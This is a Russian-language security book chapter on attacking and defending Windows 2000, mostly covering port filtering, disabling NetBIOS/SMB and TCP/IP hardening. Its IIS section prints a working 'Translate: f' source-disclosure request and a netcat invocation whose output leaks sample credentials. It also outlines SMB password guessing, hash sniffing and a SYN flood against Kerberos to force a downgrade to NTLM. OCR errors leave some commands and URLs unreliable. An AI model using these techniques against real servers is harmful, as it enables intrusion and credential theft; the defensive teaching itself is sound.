    Во время написания этой книги появился только сервисный пакет Service Pack 1. В нем устранено порядка 17 ошибок, связанных с вопросами безопасности (на самом деле большинство из них касается Internet Information Server (US) и Internet Explorer (IE)). Этот сервисный пакет можно найти по адресу http: //www.microsoft.com/technet/security/w2kspl.asp. В данной главе будут рассмотрены лишь наиболее важные проблемы, связанные с первым сервисным пакетом. При этом обсуждение будет проводиться в соответствии с описанной выше стандартной методологией атак, включающей в себя следующие этапы: предварительный сбор данных, сканирование, инвентаризацию, проникновение (penetrate), выведение из строя служб (при желании), расширение привилегий, извлечение данных (pilfer), отслеживание деятельности и выявление изъянов процесса инсталляции (install back doors). В этой главе будут кратко затронуты лишь первые этапы стандартной атаки, а именно предварительный сбор данных, сканирование и инвентаризация, о которых шла речь в первых трех главах этой книги.

    Материал этой главы основывается на информации, изложенной в разделах главы 3, посвященных вопросам инвентаризации операционной системы Windows NT/2000, а также в главеб, поэтому настоятельно рекомендуем прочитать эти главы, прежде чем приступать к изучению настоящей главы.

    В процессе обсуждения будут отмечены многие новые возможности обеспечения безопасности, включенные в Windows 2000. Эта новая функциональность поможет системным администраторам избежать многих из описанных ниже проблем.


    2. Предварительный сбор данных



    Предварительный сбор данных


    Как упоминаюсь в главе 1, большинство злоумышленников стараются получить максимум информации, не обращаясь напрямую к интересующему их серверу. Основным источником для предварительного сбора информации является система доменных имен DNS (Domain Name System) — стандартный протокол Internet, обеспечивающий преобразование IP-адресов и осмысленных имен типа www.hackingexposed.com.

    Перенос зоны DNS



    Поскольку пространство имен активного каталога операционной системы Windows 2000 основывается на использовании системы доменных имен, компания Microsoft существенно обновила реализацию сервера DNS в Windows 2000 с целью обеспечения потребностей активного каталога. По умолчанию перенос зоны DNS возможен на любой удаленный узел, что является основным средством сбора предварительной информации. Более подробные сведения по этому вопросу содержатся в главе 3.

     Отключение переноса зоны



    К счастью, реализация системы DNS для Windows 2000 допускает простую возможность ограничения переноса зоны, как описано в главе 3.


    3. Сканирование



    Сканирование


    Операционная система Windows 2000 прослушивает список портов, многие из которых не были задействованы в Windows NT 4 и появились лишь в этой версии операционной системы. В табл. 6.1 приводится список некоторых портов, прослушиваемых по умолчанию контроллером домена Windows 2000. Каждый из них является потенциальной точкой входа в систему.

    Список номеров портов TCP и UDP, используемых службами и программами компании Microsoft, можно найти в перечне ресурсов по адресу http://www.microsoft.com/windows2000/
    library/resouces/reslcit/ samplechapters/default.asp. 

    Таблица 6.1. Список портов, прослушиваемых по умолчанию контроллером домена Windows 2000

    Порт
    Служба
    TCP 25
    SMTP
    TCP 21
    FTP
    TCP/UDP 53
    DNS
    TCP 80
    WWW
    TCP/UDP 88
    Kerberos
    TCP 135
    RPC/DCE Endpoint mapper
    UDP 137
    Служба имен NetBIOS
    UDP 138
    Служба дейтаграмм NetBIOS
    TCP 139
    Служба сеансов NetBIOS
    TCP/UDP 389
    LDAP
    TCP 443
    HTTP поверх SSl/TLS
    TCP/UDP 445
    Microsoft SMB/CIFS
    TCP/UDP 464
    Kerberos kpasswd
    UDP 500
    IKE (Internet Key Exchange) (согласно протоколу IPSec)
    TCP 593
    HTTP RPC Endpoint mapper
    TCP 636
    LDAP поверх SSLДLS
    TCP 3268
    Глобальный каталог службы активных каталогов
    TCP 3269
    Глобальный каталог службы активных каталогов поверх SSL
    TCP 3389
    Терминальный сервер Windows

    Контрмеры: отключение служб и блокировка портов



    Наилучший способ предотвращения всевозможных атак — это блокировка доступа к этим службам как на уровне сети, так и на уровне отдельных компьютеров.
    Внешние устройства контроля доступа к сети (переключатели, маршрутизаторы, брандмауэры и т.д.) нужно сконфигурировать таким образом, чтобы пресечь любые попытки доступа извне ко всем указанным портам, (Обычно это делается следующим образом. Отключаются все протоколы для всех доменов, а затем подключаются только некоторые службы для избранных доменов.) При этом, конечно, необходимо помнить об очевидных исключениях: порт 80 или 443 нужно оставить для работы Web-серверов. Ни один из этих портов не должен быть доступен за пределами сети, и лишь некоторые могут предоставляться для использования проверенными пользователями внутренних подсетей. Особенно это касается контроллера домена. На это есть две причины.

    •  В главе 3 было показано, как можно подключиться к портам TCP 389 и TCP 3268 через службу LDAP и глобальный каталог соответственно и получить данные с сервера.
    •  Как отмечалось в главе 3, служба сеансов NetBIOS Session Service, работающая через порт TCP 139, является одним из источников утечки информации и потенциального взлома сети под управлением Windows NT. Большинство действий, описанных в главе 5, выполняется исключительно через соединения по протоколу NetBIOS. Данные операционной системы Windows 2000 могут также быть получены через порт TCP 445.

    He забудьте прочитать раздел " Отключение служб NetBIOS/SMB в Windows 2000" ниже в этой главе.
    Имеет смысл также защитить порты, находящиеся в состоянии ожидания запросов, отдельных компьютеров. Такая "защита в глубину" значительно затрудняет возможность сетевых атак. Классический совет в этой связи сводится к завершению работы всех ненужных служб с помощью программы services.msc и их отключению. Особое внимание следует уделить котроллерам доменов под управлением Windows 2000: когда контроллеру домена делегируются права сервера (Server) или расширенного сервера (Advanced Server) с помощью команды dcpromo.exe, на нем автоматически устанавливаются служба активного каталога, DNS и сервер DHCP, а также открываются соответствующие порты. Контроллеры доменов — это важнейшие компоненты сети, поэтому они требуют особого обращения. Большинство приложений, файловые службы и службы печати лучше устанавливать на других компьютерах. Стремление к минимуму — первый принцип безопасности.
    Чтобы ограничить доступ к портам отдельных компьютеров, можно использовать проверенные временем фильтры для протокола TCP/IP. Доступ к этим параметрам можно получить через вкладку Options диалогового окна, открываемого с помощью команды Network and Dial-up Connections>Properties>lnternet Protocol (TCP/IP) Properties>Advanced. Однако здесь сохранились старые недостатки. Фильтры протокола TCP/IP применяются сразу ко всем адаптерам. Их установка приведет к невозможности загрузки данных, инициированной даже легитимными соединениями, и сделает невозможным обычный просмотр Web-страниц в броузере системы. Кроме того, для корректного вступления в силу внесенных изменений требуется перегрузить систему.

    Проведенное авторами тестирование Windows 2000 показало, что установка фильтров TCP/IP не блокирует эхо-пакетов ICMP (протокол 1), даже если отключить все протоколы IP, кроме 6 (TCP) и 17 (UDP).

    Фильтры IPSec



    Для установки фильтров на порты отдельных компьютеров лучше использовать фильтры протокола IPSec. Эти фильтры явились побочным результатом новой реализации протокола IPSec для Windows 2000 и были с успехом использованы командами разработчиков сетей Openhack и windows2000test.com. Фильтры IPSec обрабатывают пакеты в стеке сети и просто-напросто выбрасывают те из них, которые не удовлетворяют характеристикам фильтра. В отличие от фильтров TCP/IP фильтры IPSec можно применять к отдельным интерфейсам. Кроме того, они блокируют запросы ICMP (однако они не настолько "тонки", чтобы блокировать отдельные подтипы запросов ICMP, скажем, эхо, отклики на эхо-запросы, временные метки и т.д.). Для вступления в силу фильтров IPSec перезагрузка не требуется (хотя изменение параметров фильтров может привести к разрыву существующих соединений IPSec). Такие фильтры обеспечивают решение проблемы для сервера и неприменимы в качестве средства обеспечения функциональности брандмауэра для рабочих станций, поскольку подобно фильтрам TCP/IP они будут блокировать загрузку информации, инициированную даже допустимыми соединениями (если не будут открыты все порты с более высокими номерами).
    Фильтры IPSec можно создать с помощью аплета Administrative Tools^Local Security Policy (secpol .msc). Щелкните правой кнопкой на элементе IPSec Policies On Local Machine в левой панели окна, а затем выберите из контекстного меню команду Manage IP Filter Lists And Filter Actions.
    Для управления фильтрами IPSec автор книги предпочитает использовать утилиту командной строки ipsecpol.exe. Ее можно применять при создании сценариев, а, кроме того, пользоваться ею гораздо проще, чем утилитой управления политикой IPSec с графическим интерфейсом. Утилиту ipsecpol.exe можно найти по адресу http:/www.microsoft.com/technet/security/tools.asp среди средств конфигурирования безопасности Windows 2000 Internet Server. Следующие команды утилиты ipsecpol. ехе позволяют оставить открытым на данном компьютере только порт 80.

    ipsecpol \\имя_компыотера -w REG -p "Web" -о
    ipsecpol \\имя_компьютера -х -w REG -p "Web"-r
    "BlockAll" -n BLOCK -f 0+* ipsecpol
    \\имл_комльютера -x -w REG -p "Web" -r
    "OkHTTP" -n PASS -f 0:80+*::TCP

    Две последние команды создают политику IPSec под названием Web, включающую два правила фильтрации. Первое из них, BlockAll, блокирует все протоколы поступающих и исходящих сообщений для данного компьютера и всех других компьютеров, а второе, OkHTTP, разрешает трафик через порт 80 данного и всех остальных компьютеров. Если нужно разрешить использование утилиты ping, или других программ, работающих на базе протокола ICMP (чего мы настоятельно не рекомендуем делать без особой необходимости), то в политику Web можно включить такое правило.
    ipsecpol \\имя_компыотера -х -w REG -p "Web" -r "OkICMP" -n PASS -f 0+*::ICMP
     В этом примере политика устанавливается для всех адресов, однако ее можно легко модифицировать на случай одного IP-адреса с помощью ключа -f (табл. 6.2) и направить действие этого правила на один интерфейс. Если система сконфигурирована с помощью этого примера, то при сканировании портов будет виден только порт 80. После отключения политики все порты снова станут доступными.
    Описание всех аргументов, использованных в примере, приводится в табл. 6.2 (для получения полной информации о возможностях утилиты ipsecpol запустите команду ipsecpol -?).

    Таблица 6.2. Параметры утилиты ipsecpol, используемые для фильтрации трафика через компьютеры под управлением Windows 2000

    Параметр
    Описание
    -w REG
    Переводит утилиту ipsecpol в статический режим (static mode), при котором выполняется запись политики в указанное местоположение (в отличие от используемого по умолчанию динамического режима, который действует только во время функционирования службы Policy Agent). Параметр REG определяет, что политика будет записана в системный реестр и подходит для отдельно стоящих Web-серверов (другой параметр, DS, позволяет записывать политику в каталог)
    -P
    Задает произвольное имя (например, web) для данной политики. Если уже существует политика с таким именем, то данное правило добавляется к ней. Например, в третьей строке к политике Web добавляется правило ОШТТР
    -r
    Задает произвольное имя для правила. Если политика уже включает правило с таким именем, то новое правило его заменит
    -n
    В статическом режиме может принимать одно из трех значений: BLOCK, PASS и IN PASS. Конкретные значения параметра описываются ниже
    BLOCK
    Исключает остальные значения параметра -п и создает фильтры блокировки. Эта команда аналогична выбору переключателя Block в программе управления политикой IPSec с графическим интерфейсом
    PASS
    Исключает остальные значения параметра -п и создает фильтры, обеспечивающие передачу данных через порты. Эта команда аналогична выбору переключателя Permit в программе управления политикой IPSec с графическим интерфейсом
    -f
    Задает список, состоящий из одного или нескольких IP-фильтров. Правила фильтрации задаются в следующем формате, получившем название спецификации фильтра (filterspec):
    А . B . C . D/ маска: порт=А .B.C. D/
    маска : порт:Ipprotocol

    где в левой части равенства всегда задается адрес источника, а в правой — адрес получателя. Если знак = заменить на символ +, то будут созданы два зеркальных (mirrored) фильтра, по одному в каждом направлении. Маску и номер порта задавать необязательно. Если они не указаны, то в качестве маски подсети используется 255. 255. 255. 255, а в качестве номера порта — любой порт. Комбинацию А . в . C . D/ маска можно заменить следующими символами:
    0 задает адрес локальной системы 
    * обозначает произвольный адрес 
    имя ONS (заметим, что множественное разрешение игнорируется).
    Тип IP-протокола (например, ICMP) задавать необязательно. Если он не указан, то подразумевается любой IP-протокол. Чтобы задать конкретный IP-протокол, перед его названием необходимо точно указать номер порта или символ : :
    -x
    Необязательный параметр, активизирующий политику в случае ее записи в системный реестр локальной машины (он использовался в предыдущем примере при определении первого правила. По каким-то причинам этот параметр работает только при создании первого фильтра политики)

    Необязательный параметр, отключающий политику в случае ее записи в системный реестр локальной машины
    -o
    Необязательный параметр, удаляющий политику, имя которой задано параметром -р. (Заметим, что при этом удаляются все аспекты указанной политики. Его не следует использовать, если другие политики ссылаются на объекты данной политики)

    Следует отметить, что фильтры IPSec не блокируют порт 500 (UDP) или, на контроллерах домена Win 2000, порт 88 (TCP/UDP), используемые для аутентификации IPSec (порт 88 применяется протоколом Kerberos, a 500 — для обмена ключами IKE (Internet Key Exchange)). Сервисный пакет Service Pack 1 включает новый параметр реестра, позволяющий закрыть порты Kerberos путем отмены привилегий для драйвера IPSec:

    HKLM\SYSTEM\CurrentControlSet\
    Services\IPSEC\NoDefaultExempt
    Type: DWORD
    Max: 1
    Min: 0
    Default: 0

    Трафик IKE всегда был привилегированным, и параметры системного реестра на него не влияли. Если же этот параметр реестра принимает значение 1, то все "льготы" для протоколов Kerberos и RSVP отменяются по умолчанию.

    Автор высказывает благодарность Майклу Ховарду (Michael Howard) из группы обеспечения безопасности Windows 2000 за помощь в изучении команды ipsecpol и нового параметра системного реестра.

    Поскольку утилита ipsecpol использует синтаксис командной строки, с ней нужно обращаться очень осторожно. В рассмотренном выше примере предполагается, что список фильтров обрабатывается сверху вниз. Простое изменение порядка следования записей в списке может привести к неправильной работе фильтров. Кроме того, утилита не позволяет задать диапазон портов для источника или назначения. Так что несмотря на значительные улучшения, обеспечиваемые фильтрами IPSec по сравнению с фильтрами TCP/IP, с ними нужно обращаться очень аккуратно. Иначе желание блокировать порты так и останется лишь желанием. Отметим еще несколько особенностей, выявленных процессе интенсивного тестирования утилиты ipsecpol.

    •  Для отмены политики иногда приходится отключать ее с помощью ключа -у до или после ее удаления с использованием параметра -о. Автору приходилось сталкиваться с ситуацией, когда даже удаленная политика продолжает действовать до момента ее отключения.
    •  При изменении политики необходимо пользоваться либо только утилитой командной строки ipsecpol, либо исключительно программой с графическим интерфейсом. Если политика была создана с помощью программы ipsecpol, а затем отредактирована в другой программе, то при ее работе возможны сбои и бреши в защите.
    •  Не забывайте удалять ненужные фильтры, чтобы избежать конфликтов. Эту задачу лучше выполнять с помощью программы с графическим интерфейсом, поскольку в ней отображается список всех существующих фильтров.



    4. Инвентаризация



    Инвентаризация


    В главе 3 было показано, как из операционной системы Windows NT 4.0 можно получить сведения об учетных записях, совместно используемых ресурсах и другую информацию. Было показано, что служба NetBIOS передает эти данные анонимным пользователям, проникающим в систему через злополучный нулевой сеанс. Там же было указано, что служба активных каталогов предоставляет эту информацию неаутентифицированным злоумышленникам. Здесь мы не будем снова описывать эти виды атак, однако отметим, что Windows 2000 обеспечивает некоторые новые возможности по решению проблем со службами NetBIOS и SMB.
    Одним из наиболее существенных новшеств Windows 2000 является возможность обойтись без протокола NetBIOS. Как было показано в главе 3, службу NetBIOS, работающую поверх протокола TCP/IP, можно отключить с помощью команды Properties of Network&Dial-up Connection^Properties of Internet Protocol (TCP/IP)c*Advanced(KHonKa)[=> WINS(BKnaflKa)=>Disable NetBIOS Over TCP/IP.
    Однако не все так просто. Следует отметить, что, несмотря на отключение транспортного протокола NetBIOS, Windows 2000 при этом продолжает использовать протокол SMB поверх TCP (порт 445) для совместного использования файлов (см. табл. 6.1).
    Таким образом, компания Microsoft сыграла злую шутку с неопытными пользователями, которые, отключив службу NetBIOS поверх TCP/IP (с помощью вкладки WINS диалогового окна свойств соединения для локальной сети) будут считать, что все проблемы с нулевым сеансом решены. На самом деле это не так. Такое отключение закрывает лишь порт TCP 139, но не 445. На первый взгляд может показаться, что этого достаточно для решения проблем с нулевым сеансом, поскольку злоумышленники, не установившие сервисный пакет Service Pack 6a, не могут подключиться через порт 445 и открыть нулевой сеанс. Однако клиентам Windows 2000 и пользователям более ранней операционной системы с сервисным пакетом Service Pack 6a такая возможность доступна. Следовательно, они могут выполнять инвентаризацию, использовать команды user2sid/sid2user и выполнять другие опасные действия, подробно описанные в главе 3. Поэтому не следует заблуждаться по поводу наличия новых команд в интерфейсе и терять бдительность.

    Отключение служб NetBIOS/SMB в Windows 2000



    К счастью, можно отключить и порт 445, однако эта операция выполняется отдельно для каждого конкретного адаптера (подобно операции отключения порта 139 в NT 4). При этом сначала необходимо найти соответствующую вкладку (возможно, она переместилась в новое, никому неизвестное местоположение — еще один недостаток графического интерфейса). Теперь ее можно открыть с помощью аплета Network and Dial-up Connections, выбрав команду Advanced>Advanced Settings, как показано на следующем рисунке.
    При сбросе флажка File and Printer Sharing for Microsoft Networks (рис. 6.1) доступ к портам 139 и 445 через нулевое соединение будет отключен (а за одно будет отключена и возможность совместного использования файлов и принтеров). Для вступления в действие этих изменений перезагрузка не требуется (компанию Microsoft следует поблагодарить за полученную наконец возможность установки многих сетевых параметров без перезагрузки компьютера). Это по-прежнему наилучший способ конфигурирования внешних интерфейсов сервера, соединенного с Internet.



    Рис. 6.1. Отключение служб NetBIOS и SMB/CIFS, обеспечивающих совместное использование файлов и принтеров, в диалоговом окне Advanced Settings аплета Network and Dial-up Connections

    Порт TCP 139 будет отображаться в результате Сканирования портов даже после выполнения указанных действий. Однако этот порт больше не будет предоставлять информацию, связанную со службой NetBIOS. Если вы не отключаете протоколы NetBIOS/SMB, не забывайте установить значение параметра RestrictAnonymous. Теперь это можно сделать с помощью команды Administrative Tools>Local Security Policy (или Domain или Domain Controller>Local Policies>Security Options>No Access Without Explicit Anonymous Permissions. Эта команда эквивалентна установке в системном реестре Windows 2000 значения 2 для параметра RestictAnonymous. Некоторые возможные проблемы, связанные с установкой значения 2 для параметра RestictAnonymous описаны в базе знаний Knowledge Base по адресу http://eearch.support.micro8oft.com. (статья Q246261).

    Не забывайте, что ограничить доступ к данным протокола NetBIOS или SMB можно также с помощью фильтров IPSec.


    1.gif

    Изображение: 

    5. Проникновение



    Проникновение


    Как будет видно из дальнейшего изложения, новая версия операционной системы Windows 2000 подвержена всем тем же типам удаленных атак, что и NT 4.


    6. Получение пароля NetBIOS или SMB



    Получение пароля NetBIOS или SMB


    Средства, подобные описанной в главе 5 утилите SMBGrind, пригодны также для получения паролей в системе Windows 2000. Если службы NetBIOS и SMB/CIFS включены, и клиент может использовать SMB-запросы, то пароли доступа к совместно используемым ресурсам являются самым уязвимым местом системы Windows 2000.

    Один из участников группы разработки серверного и клиентского программного обеспечения Samba (http://eamba.org) Люк Лейтон (Luke Leighton) неоднократно подчеркивал различие между NetBIOS и SMB. NetBIOS — это транспортный протокол, а 8MB — протокол совместного использования файлов, связанный с поддерживаемыми протоколом NBT (NetBIOS поверх TCP) именами типа ИМЯ_СЕРВЕРА#20. Подобно любому серверу общего назначения, такие серверы обмениваются информацией через порт TCP. Таким образом, протокол SMB взаимодействует с портом TCP 445 и не имеет ничего общего с NetBIOS.


    7. Получение хэш-кодов паролей



    Получение хэш-кодов паролей


    Утилита перехвата пакетов SMB L0phtcrack, описанная в главе 5, по прежнему может эффективно перехватывать и взламывать хэш-коды диспетчера локальной сети LM и NTLM, передаваемые между клиентами нижнего уровня (NT 4 и Win9x) и сервером Windows 2000. Новая процедура регистрации по протоколу Kerberos предусматривает выполнение идентификации средствами NTLM, если на одном из концов соединения протокол Kerberos не поддерживается, что и происходит между клиентом Windows 2000 и сервером NT 4 или Win9x
    Интересным видом атаки для Windows 2000 яачяется попытка отключения протокола идентификации Kerberos (например, "парализуя" пакетом SYN порт TCP 88 контроллера домена, используемый протоколом Kerberos) с целью вынудить клиентов использовать процедуры аутентификации для NT 4, уязвимые для перехвата пакетов SMB.


    8. Атаки против IIS 5



    Атаки против IIS 5



    По возрастающей популярности с атаками на протоколы NetBIOS или 8MB могут сравниться лишь многочисленные методологии атак на US (Internet Information Server), поскольку это единственная служба, обязательно присутствующая в подключенных к Internet системах под управлением NT/2000. Эта служба встроена в операционные системы семейства Windows 2000. По умолчанию сервер IIS 5.0 и службы Web доступны во всех серверных версиях. И хотя вопросы, связанные с хакингом в Web, будут более подробно рассмотрены в главе 15, мы не можем обойти своим вниманием атаку на Internet Information Server, широко обсуждаемую компьютерной общественностью перед самым выходом в свет этой книги.

    Проблема US "Translate: f"



    Проблема, связанная со вскрытием кода (showcode) не нова: она была свойственна и более ранним версиям Internet Information Server. Она получила название Translate: f и была описана Даниелем Дочкалом (Daniel Docekal) в бюллетене Bugtraq. Эта проблема является хорошим примером ситуации, когда взломщик направляет Web-серверу неожиданные данные и тем самым заставляет его выполнять неприемлемые в обычных условиях действия. Это классический вид атаки против протоколов обработки документов типа HTTP.
    Атака Translate: f состоит в отправке искаженного запроса GET протокола HTTP на выполнение серверного сценария или обработку другого файла аналогичного типа (например, файлов с расширением .ASP (Active Server Pages) или global.asa). Эти файлы предназначены для выполнения на сервере, а не на клиентском компьютере. Видоизменение запроса приводит к тому, что Internet Information Server направляет содержимое файла удаленному клиенту, а не выполняет его с использованием соответствующего механизма обработки сценариев. Ключевым свойством искаженного запроса GET для протокола HTTP является наличие специального заголовка, завершающегося выражением Translate: f, и использование адреса URL, завершающегося символом обратной косой \. Ниже приводится пример такого запроса (строка [CRLF] означает символ возврата каретки/перевода строки, который в шестнадцатеричной системе счисления имеет код ODOA). Обратите внимание на обратную косую после имени файла global .asa и заголовок Translate: f.

    GET/global.asa\ HTTP/1.0
    Host: 192.168.20.10
    User-Agent: SensePostData
    Content-Type: application/x-www-form-urlencoded
    Translate: f
    [CRLF]
    [CRLF]

    Если путем конвейерной обработки текстовый файл с этой информацией направить (с помощью утилиты netcat) на уязвимый сервер IIS, то в командной строке отобразится содержимое файла /global, as a:

    D:\type trans.txtI nc -nw 192.168.234.41 80
    (UNKNOWN) [192.168.234.41] 80 (?) open
    HTTP/1.1 200 OK
    Server: Microsoft-IIS/5.0
    Date: Wed, 23 Aug 2000 06:06:58 GMT
    Content-Type: application/octet-stream
    Content-Length: 2790
    Etag: "0448299fcd6bf1:bea"
    Last-Modified: Thu, 15 Jun 2000 19:04:30 GMT
    Accept-Ranges: bytes
    Cache-Control: no-cache
    <!-Copyright 1999-2000 bigCompany.com—>
    <object RUNAT=Server SCOPE=Session ID=fixit
    PROGID="Bigco.object"x/object>
    ("ConnectionText") = "
    DSN=Phone;UID=superman;Password=test;"
    ("ConnectionText") = "
    DSN=Backend;UID=superman;PWD=test;"
    ("LDAPServer") = "LDAP://Idap.bigco.com:389"
    ("LDAPUserlD") = "cn=Admin"
    ("LDAPPwd") = "password"

    Мы слегка модифицировали содержимое файла global.asa, чтобы продемонстрировать наиболее характерную информацию, которую может извлечь из него взлом-шик. К сожалению, на многие узлах до сих пор встраивают пароли приложений в ASP и ASA-файлы, повышая тем самым вероятность последующего проникновения хакеров в свои пенаты. Как видно из этого примера, взломщик, вскрывший содержимое файла global.asa, получает в свое распоряжение пароли многих серверов нижнего уровня, включая систему LDAP.
    Готовые сценарии взлома на языке Perl, упрощающие описанную выше процедуру использования команды netcat, можно найти в Internet (авторы этой книги пользовались сценариями tarans.pl Ройлофа Темминга (Roelof Temmingh) и srcgrab.pl Смайлера (Smiler)).

    Корни проблемы Translate: f - протокол WebDAV и канонизация



    При первом выявлении этой проблемы вокруг ее причин разгорелись бурные споры. Официальная позиция компании Microsoft сводилась к тому, что причиной является некорректное поведение внутреннего обработчика файлов в ядре US (что в прошлом действительно приводило к некоторым проблемам). Эта позиция была обнародована в разделе MSOO-58, посвященном вопросам безопасности по адресу http: //www.microsoft.com/technet/security/bulletin/fq00-058.asp.
    Однако Даниель Дочкал (Daniel Docekal) считает, что причиной проблемы является протокол WebDAV (Web Distributed Authoring and Versioning) — протокол обеспечения стандартов Internet, поддерживаемый преимущественно компанией Microsoft и позволяющий удаленным авторам создавать, удалять, перемещать, находить и изменять атрибуты файлов и каталогов на Web-серверах (чувствуете, с какими проблемами это может быть сопряжено?). Протокол WebDAV Web-сервером IIS 5 поддерживается по умолчанию. И хотя заголовок HTTP Translate: не описан в спецификации протокола WebDAV (RFC 2518) или других известных авторам документах, Даниель Дочкал утверждает, что встречал ссылку на него в библиотеке сети MSDN компании Microsoft. По его словам, там рассказывалось об использовании этого заголовка для получения файлового потока путем указания значения F (false) в поле заголовка Translate.
    В процессе обсуждения этого вопроса с группой обеспечения безопасности продуктов Microsoft выяснилось, что это действительно так. По их словам протокол WebDAV реализован в динамической библиотеке httpext.dll в виде фильтра ISAPI, интерпретирующего Web-запросы до их передачи ядру IIS. Заголовок Translate: f предполагает обработку этого запроса, а обратная косая вводит фильтр в заблуждение, и он направляет этот запрос непосредственно операционной системе. Система Win 2000 благополучно возвращает этот файл системе злоумышленника, а не выполняет его на сервере (как положено по всем правилам).
    Здесь мы вплотную подошли к вопросу канонизации (canonicalization). Это понятие описано специалистами компании Microsoft в разделе MSOO-57 по адресу http://www.microsoft.com/technet/security/bulletin/fq00-057.asp. Там говорится следующее: "Канонизация — это процесс приведения различных эквивалентных форм имени к единому стандартному имени, называемому каноническим именем (canonical name) . Например, на данном компьютере имена c:\dir\test.dat и . . \. . \test.dat могут ссылаться на один и тот же файл. Канонизация — это процесс приведения таких имен к виду c:\dir\test.dat."
    Использование одной из различных эквивалентных форм канонического имени файла может привести к обработке запроса другими средствами IIS или операционной системы. Хорошим примером проблемы канонизации является вскрытие исходного кода с помощью выражения : :$DATA. Если к некоторому файлу обратиться по специальному имени, то файл будет возвращен броузеру в некорректном виде (Более подробная информация об этом содержится в главе 15).
    Подобным образом работает и заголовок Translate: f. Значение f вводит службу WebDAV в заблуждение, в результате чего файловый поток возвращается броузеру.

    Контрмеры: решение для проблемы Translate: f



    Чтобы уменьшить риск, связанный с проблемой Translate: f и другими попытками вскрытия кода, достаточно просто иметь в виду, что любые исполняемые на сервере файлы могут быть видимы пользователям Internet и никогда не хранить в них секретную информацию. Неизвестно, связано ли это с участившимися попытками вскрытия кода, но компания Microsoft предлагает такой подход в качестве "обычной рекомендации по безопасности" в разделе FAQ MS00-58, уже упомянутом ранее.
    Еще один способ решения этой проблемы сводится к установке сервисного пакета Service Pack 1 к системе Win 2000, упомянутого в том же разделе FAQ. При его установке IIS будет интерпретировать серверные исполняемые сценарии и схожие типы файлов с помощью соответствующего механизма обработки сценариев на сервере независимо от типа заголовка.
    Как указывает Расе Купер (Russ Cooper) (бюллетень NTBugtraq), проблема Translate: f существенно связана с версией сервера IIS. Например, модуль обновления для 1IS4 успешно решает эту проблему. Таким образом, решение указанной проблемы сводится к следующему.
    1. Аналогичная проблема для IIS4.0/IIS5.0, а также проблема размещения виртуальных каталогов на совместно используемых дисках с именами UNC, решается с помощью MSOO-019. Таким образом, после установки сервисного пакета системы с сервером IIS 4 становятся неуязвимыми для таких атак.
    2. Системы на базе IIS 5.0 (с применением MSOO-019 или без) необходимо обновить с помощью сервисного пакета SP1 или MS00058.
    Заметим также, что если для виртуального каталога IIS, содержащего нужный файл, установлено разрешение, отличное от Read, то при атаке Translate: f будет возвращена ошибка "HTTP 403 Forbidden" (даже если установлен режим Show Source Code). Если же для виртуального каталога, содержащего указанные файлы установлено разрешение Read, то эти файлы могут быть доступны взломщику.
    Надеемся, этот экскурс в страну 1IS будет полезен читателю и поможет осознать один из способов проникновения в операционную систему. Более подробная информация об атаках на IIS содержится в главе 15.


    9. Удаленное переполнение буфера



    Удаленное переполнение буфера


    В главе 5, рассматривался вопрос переполнения буфера для системы Windows NT. В настоящее время выявлено несколько случаев переполнения буфера приложений, работающих под управлением NT/2000, но не самой операционной системы.


    10. Отказ в обслуживании



    Отказ в обслуживании


    Если большинство серьезных атак против операционной системы NT, направленных на генерацию состояния DoS (отказ в обслуживании), предотвращаются с помощью сервисного пакета NT 4 Service Pack 6a, то Win 2000 является сравнительно надежной в этом отношении операционной системой. До сих пор не было обнаружено никаких угроз возникновения условия DoS, даже после тестирования операционной системы на узле win2000test.com.

    Атака SYN и бомбардировка  IP-пакетами



    Internet подтверждает известную истину: жизнь — это игра без правил. Особенно наглядно это проявилось в эксперименте с Win2000test.com, когда согласно правилам атаки DoS были категорически запрещены. Тем не менее, серверы этого узла подверглись массированным атакам IP-пакетами, количество которых значительно превысило возможности серверов по их обработке, а также хорошо известным атакам SYN, приводящим к переполнению очередей в стеке протокола TCP/IP (более подробная информация о специфике этих атак содержится в главе 15).

    Контрмеры против атак DoS



    Чтобы минимизировать ущерб от подобных атак, необходимо соответствующим образом настроить сетевые шлюзы или брандмауэры (более подробная информация содержится в главе 12). Однако еще раз повторим, что целесообразно также противостоять таким атакам на уровне отдельных компьютеров. Это сыграет свою роль, если одна из линий обороны будет прорвана. Благодаря эксперименту с узлом Win2000test.com компания Microsoft смогла добавить в операционную систему Windows 2000 несколько новых ключей системного реестра, которые можно использовать для защиты стека протокола TCP/IP от атак DoS. В табл. 6.3 содержится информация о конфигурации параметров системного реестра на серверах win2000test.com (эта таблица создана на основе отчета компании Microsoft, посвященного результатам эксперимента и расположенного по адресу http://www.microsoft.com/security, а также личного общения авторов с группой разработчиков Win2000test. com).

    Некоторые из этих значений, например synAttackProtect=2, в некоторых случаях могут оказаться слишком жесткими. Они были выбраны для защиты сервера Internet с активным трафиком.

    Таблица 6.3. Рекомендуемые параметры для стека протокола TCP/IP в операционной системе NT/2000, позволяющие предотвратить атаки DoS

    Параметр в разделе HKLM\Sye\CCS\ Services
    Рекомендуемо значение
     Описание
    Tcpip\ Parameters \ SynAttackProtect
    2
    Этот параметр позволяет настраивать процесс передачи подтверждений SYN-ACK и обеспечивает более быстрый переход в режим ожидания при выявлении атаки SYN. Выявление этой атаки базируется на текущих значениях параметров TcpMaxPortsExhausted, TCPMaxHalfOpen и TCPMaxHalfOpenRetried. Значение 2 обеспечивает наилучшую защиту от SYN-атак, но может привести к проблемам с соединениями, характеризующимися высокой задержкой. Кроме того, если этот параметр принимает значение 2, то не учитываются следующие опции сокетов: переменный размер окна (RFC 1323) и настройка параметров TCP для каждого адаптера (размер окна)
    Tcpip\Parameters\ EnableDeadGWDetect
    0
    Если этот параметр принимает значение 1 , то протокол TCP может выявлять неактивные шлюзы и в случае трудностей с несколькими соединениями переключаться на резервный шлюз. Резервные шлюзы можно определить в разделе Advanced диалогового окна конфигурации протокола TCP/IP аплета Network панели управления. Если этот параметр принимает значение 0, то взломщик не может спровоцировать переключение на менее желательные шлюзы
    Tcpip\Parameters\ EnablePMTUDiscovery
    0
    Если этот параметр принимает значение 1 (true), то протокол TCP пытается определить максимальную единицу передачи MTU (Maximum Transmission Unit) для каждого соединения с удаленным узлом. Определив значение MTU и ограничив этим значением размер сегментов TCP, можно устранить фрагментацию на маршрутизаторах, соединяющих сети с различными значениями MTU вдоль пути следования пакетов. Фрагментация может приводить к пробкам в сети. Если этот параметр принимает значение 0, то значение MTU принимается равным 576 байт для всех соединений, инициированных извне локальной подсети. Это препятствует попыткам хакеров изменить значение MTU на меньшее с целью переполнения стека
    Tcpip \Parameters \Keep AliveTime
    300000 (5минут)
